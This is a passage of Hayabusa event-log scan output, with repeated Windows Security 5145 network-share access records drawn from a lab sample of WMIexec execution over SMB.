Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
